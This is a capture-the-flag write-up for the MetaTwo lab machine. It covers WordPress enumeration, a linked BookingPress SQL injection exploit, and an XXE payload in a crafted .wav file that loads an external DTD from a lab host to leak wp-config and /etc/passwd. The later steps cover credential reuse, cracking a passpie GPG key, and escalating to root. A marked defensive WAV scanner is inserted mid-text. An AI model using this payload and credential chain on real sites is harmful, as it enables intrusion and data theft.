MetaTwo
Enumeration
Ports and Services
Software Installed:
- WordPress version 5.6.2
Nmap Scan Results:
Robots.txt:
Initial Foothold
Found vulnerable plugin:
Found a Python script and tested it:
URL: https://github.com/destr4ct/CVE-2022-0739/blob/main/booking-press-expl.py
Note: get the nonce by looking at a POST request in Burp.
Cracked hash for manager:
Using bookingpress-appointment-booking:
https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/
Verified the vuln by creating a .wav file and uploading it:
```shell
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.44:80/test.dtd'"'"'>%remote;%init;%trick;] >\x00'> test.wav
```
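As an added defensive check (not part of the writeup or the target's code): a Python scanner that walks the RIFF chunks of an uploaded WAV and rejects files whose iXML chunk carries DOCTYPE or entity declarations, the shape test.wav above uses. The sample inputs are constructed inline and the DTD host is a placeholder.

```python
import re
import struct

# Constructed sample inputs (not from the writeup): an iXML payload with the
# same DOCTYPE/parameter-entity shape as test.wav, and a benign BWF iXML block.
# The host below is a placeholder, not a real target.
XXE_XML = (b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
           b'"http://placeholder.invalid/test.dtd">%remote;]>')
BENIGN_XML = b'<?xml version="1.0"?><BWFXML><IXML_VERSION>1.5</IXML_VERSION></BWFXML>'

# DTD keywords. An audio file's iXML metadata never needs a DOCTYPE, so any hit
# is grounds to reject the upload before an XML parser with entity expansion sees it.
DTD_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY|SYSTEM|PUBLIC", re.IGNORECASE)


def build_wav(ixml: bytes) -> bytes:
    """Build a minimal RIFF/WAVE container holding one iXML chunk (test input)."""
    body = ixml + (b"\x00" if len(ixml) % 2 else b"")  # RIFF chunks are word-aligned
    chunk = b"iXML" + struct.pack("<I", len(ixml)) + body
    return b"RIFF" + struct.pack("<I", 4 + len(chunk)) + b"WAVE" + chunk


def iter_chunks(data: bytes):
    """Yield (fourcc, payload) per sub-chunk; a lying size field only truncates."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        fourcc = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        yield fourcc, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)


def xxe_findings(data: bytes) -> list:
    """Reasons to reject an uploaded WAV; an empty list means no DTD was found."""
    findings = []
    for fourcc, payload in iter_chunks(data):
        if fourcc != b"iXML":
            continue
        hits = sorted({m.group(0).upper().decode() for m in DTD_MARKERS.finditer(payload)})
        if hits:
            findings.append("iXML chunk declares " + ", ".join(hits))
    return findings


if __name__ == "__main__":
    print(xxe_findings(build_wav(XXE_XML)))    # ['iXML chunk declares <!DOCTYPE, <!ENTITY, SYSTEM']
    print(xxe_findings(build_wav(BENIGN_XML)))  # []
```

The keyword match is deliberately conservative; a stricter server-side version would parse the iXML chunk with DTD processing disabled and reject on any parse error.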
**To decode:**
decode.php
```php
<?php
// Paste the base64 blob returned via the external DTD in place of <hashed>;
// the leaked file comes back zlib-compressed and base64-encoded.
echo zlib_decode(base64_decode('<hashed>'));
?>
```
Then run `php -f decode.php`.
Got a copy of wp-config:
Same method for /etc/passwd:
FTP user/password works:
In the mailer folder is send-email.php, which has a password for jnelson:
User.txt Proof Screenshot
Privilege Escalation
User is using passpie for password management
Found private key:
/home/jnelson/.passpie/.keys:
Decrypted password:
Used gpg2john and john:
Exported root:
su to root:
Root Screenshot Here: